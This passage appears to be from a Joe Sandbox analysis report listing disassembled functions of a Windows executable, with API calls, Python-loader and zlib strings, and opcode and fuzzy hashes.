                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3947729631-0
                                                                                                                                                                                                                                                                    • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                                                    • Instruction ID: ceb8db3eff180ed2d92b15cf8edba3ff2dca9676efe978501d387a3f3c9e491c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A217131A067818AEB24EF68D4442EC73A2EB04B28F940635D69E66FD5DFB8D544CB60
                                                                                                                                                                                                                                                                    Function 00007FF7C2676004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                                    • Instruction ID: 8f912d2385c3f88dae71ea351b3bfd1e3355e7a2a62527987b0eac9727fe491f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB111A22A1864181EA61BF51A40027EE266EF85FA4FC44075EE8C67F96DFBDD840CB31
                                                                                                                                                                                                                                                                    Function 00007FF7C26863C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                                    • Instruction ID: c34f2c8fae4a3dc3146a2f8a38d8bfcd3162a30be87cbc6ee9328ec7bc1074e2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82219872618641C7D761AF18E440379B6A2FB84B64F944234D6DD57BD9DF7CD400CB20
                                                                                                                                                                                                                                                                    Function 00007FF7C267042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                    • Instruction ID: c9456ceb4fe01632cef678d9aadbf77850c5731ad6fc897e8ae8cbd5d41f32ff
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A018E61A0874180EA14FF52A901169E692AF85FF0B984631EEDC27FDADFBCE451C330
                                                                                                                                                                                                                                                                    Function 00007FF7C2677F6C Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                                                                                                                                                                                    • Instruction ID: 196df03108c0b67a0c69149d01d69e2a062ec6423346d97a4bd84918263acdb2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10016120A1D64380FA917E217641179D292AF44FB0FD44535E9DCA2FC6DFFCA841C631
                                                                                                                                                                                                                                                                    Function 00007FF7C26782A8 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                                                    • Instruction ID: 71e3157fbbde9fb95c5752c33539bcd52b2694d566f9896582544ca6c8014d2e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8CE08CA0E08A0382F7113EA425C217990224FA5B61FD04430E99836BC3DFEC6C48E231
                                                                                                                                                                                                                                                                    Function 00007FF7C267EC08 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(?,?,00000000,00007FF7C267B39A,?,?,?,00007FF7C2674F81,?,?,?,?,00007FF7C267A4FA), ref: 00007FF7C267EC5D
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                    • Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                                                    • Instruction ID: c1f7190f4f322722de4797dc421df0ae82eaed660f2cfc366021f8e2f51e7769
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EFF06248B09306C1FE567E6568512B5C2925F85FA0FCC5430C99EA6BD1EF9CE484C230
                                                                                                                                                                                                                                                                    Function 00007FF7C267D66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF7C2670D00,?,?,?,00007FF7C267236A,?,?,?,?,?,00007FF7C2673B59), ref: 00007FF7C267D6AA
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                                                    • Instruction ID: 848aef8e66b9ae2dcdc6520eb95cc69ce6eedd6ff6394df9b344bcc75ee78248
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BAF03004A0934285FE547F61A85127491D24F54FB0FA80A3098AE65BC1DF9CA480C230

                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                    Function 00007FF7C2665820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C2665830
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C2665842
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C2665879
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C266588B
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C26658A4
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C26658B6
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C26658CF
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C26658E1
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C26658FD
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C266590F
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C266592B
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C266593D
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C2665959
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C266596B
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C2665987
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C2665999
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C26659B5
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C26659C7
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                    • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                                    • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                                    • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                                                    • Instruction ID: f2a5b4bd9c2fd897c85cc4b5f87e566afe041e9fffc40374df1141c532bf7dc7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A522B224A09B47C1FA58BF65B8515B4A2A2BF14774FD41039C89E62FA0EFFCA148D374
                                                                                                                                                                                                                                                                    Function 00007FF7C268411C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                    • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                                    • Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                                                                    • Instruction ID: 549b68fb0e060ab6030097ec381d2fae2ac44ae06c2eebc0143070717df2096c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60B2D272A18282CBE7659E64D4407FDB7A2FB54398F901135DA4D67F84DFF8A900CB60
                                                                                                                                                                                                                                                                    Function 00007FF7C266AD1D Relevance: 12.0, Strings: 9, Instructions: 744COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                                                    • API String ID: 0-2665694366
                                                                                                                                                                                                                                                                    • Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                                                                    • Instruction ID: cb0cbca59075461ace54952edd81c68b69f65d72b28313084c5fa922eceee3ef
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09521772A146A68BD7949F24C458B7E7BBEFB44350F414138E68AA3BC0DB7CD840CB64
                                                                                                                                                                                                                                                                    Function 00007FF7C266D19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                    • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                                                    • Instruction ID: 400b83bea7cef8e0c14871020ebddf1f45a990fb5492cc33ac75873d06ac58f7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
